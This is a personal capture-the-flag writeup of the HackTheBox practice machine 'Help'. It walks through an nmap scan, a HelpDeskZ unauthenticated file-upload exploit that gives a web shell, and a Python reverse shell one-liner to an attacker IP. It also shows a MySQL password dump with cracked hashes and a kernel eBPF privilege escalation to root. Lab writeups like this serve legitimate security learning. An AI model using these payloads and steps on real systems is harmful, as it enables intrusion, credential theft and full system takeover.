HackTheBox writeup of „Help“

my first writeup for a hackthebox.eu machine called: Help, 10.10.10.120

$ nmap -Pn –script vuln 10.10.10.121
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 13:22 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.121
Host is up (0.041s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /support/:
| PHPSESSID:
|_ httponly flag not set
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
| http-enum:
|_ /support/: Potentially interesting folder
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
3000/tcp open ppp

http://10.10.10.121/support/ fileupload through a helpdeskz installation

https://packetstormsecurity.com/files/138548/helpdeskz-shell.txt

/*submit_ticket_controller.php – Line 141*
$filename = md5($_FILES[‚attachment‘][’name‘].time()).“.“.$ext;

files uploaded get get obfuscated similar to HackinOS (Vulnhub) md5 of the filname and current time.

unfortunately .php files arent allowed on the machine. too bad. tried nullbyte filenames cmd.gif^@.php etc. no luck. ah ok it seems gifs are not allowed

at least https://packetstormsecurity.com/files/138548/helpdeskz-shell.txt taught me how i could have improved my script for hackinOS.

https://vulners.com/zdt/1337DAY-ID-26838 filedownload looks promising

ok as my colleauges from link protect suggested i tried again to upload a php file and not get confused by error messages. i tried, still no luck, but then i played around with the exploit script und looked at the original helpdeskz and realized that the exploit didnt add the proper upload directory and i had to point it myself…doh, it instantly worked:

$ python hackthebox/help_expl.py http://10.10.10.121/support/uploads/tickets/ ja.gif0x00.php
Helpdeskz v1.0.2 – Unauthenticated shell upload exploit

found!
http://10.10.10.121/support/uploads/tickets/337a897ebca88cc466ee237effd5ff01.php

http://10.10.10.121/support/uploads/tickets/337a897ebca88cc466ee237effd5ff01.php?cmd=cat%20/etc/passwd

GIF89a; root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false help:x:1000:1000:help,,,:/home/help:/bin/bash sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false Debian-exim:x:110:118::/var/spool/exim4:/bin/false

i’ve got RCE 🙂

i tried a few reverse shells, a python one python -c ‚import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((„10.10.14.250“,2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([„/bin/sh“,“-i“]);‘
worked

got shell 🙂

tty upgrade python -c ‚import pty; pty.spawn(„/bin/bash“)‘
python -c ‚import pty; pty.spawn(„/bin/dash“)‘

also help@help:/home/help$ whoami
whoami
help

user 🙂

enumerating i found
$ cat /var/www/html/support/includes/config.php
show databases;
show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| mysql |
| performance_schema |
| support |
| sys |
+——————–+
5 rows in set (0.00 sec)

use support;

mysql> SELECT * FROM users;
SELECT * FROM users;
+—-+————+———————–+——————————–+——————————————+——————+——–+
| id | salutation | fullname | email | password | timezone | status |
+—-+————+———————–+——————————–+——————————————+——————+——–+
| 1 | 0 | helpme | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |
(…)
| 53 | 0 | Foo Bar | foo@bar.nul | 439d32d3c8e4170db7c2bd3dce1ba29c0cec11b4 | NULL | 1 |
+—-+————+———————–+——————————–+——————————————+——————+——–+
53 rows in set (0.00 sec)

| 1 | 0 | helpme | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |

c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca sha1 godhelpmeplz
5d3c93182bb20f07b994a7f617e99cff md5 godhelpmeplz

we got a passwd for the helpdeskz

with cat <<EOF < enum.sh
script here
EOF

i could manage to get my enumeration script on the box without having a real tty. to remember! after enum, i started looking for priv esc exploits for the configuration i found some exploits for the kernel version.

Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

after trying a few i found this one working https://www.exploit-db.com/exploits/45010

$ gcc bx.c -o bx

./bx
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800369add00
[*] Leaking sock struct from ffff88000622a400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003aa15680
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003aa15680
[*] credentials patched, launching shell…

# cat /root/root.txt
cat /root/root.txt
b7fe6082dcdf0c1b1e02ab0d9daddb98

# whoami
whoami
root

🙂

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.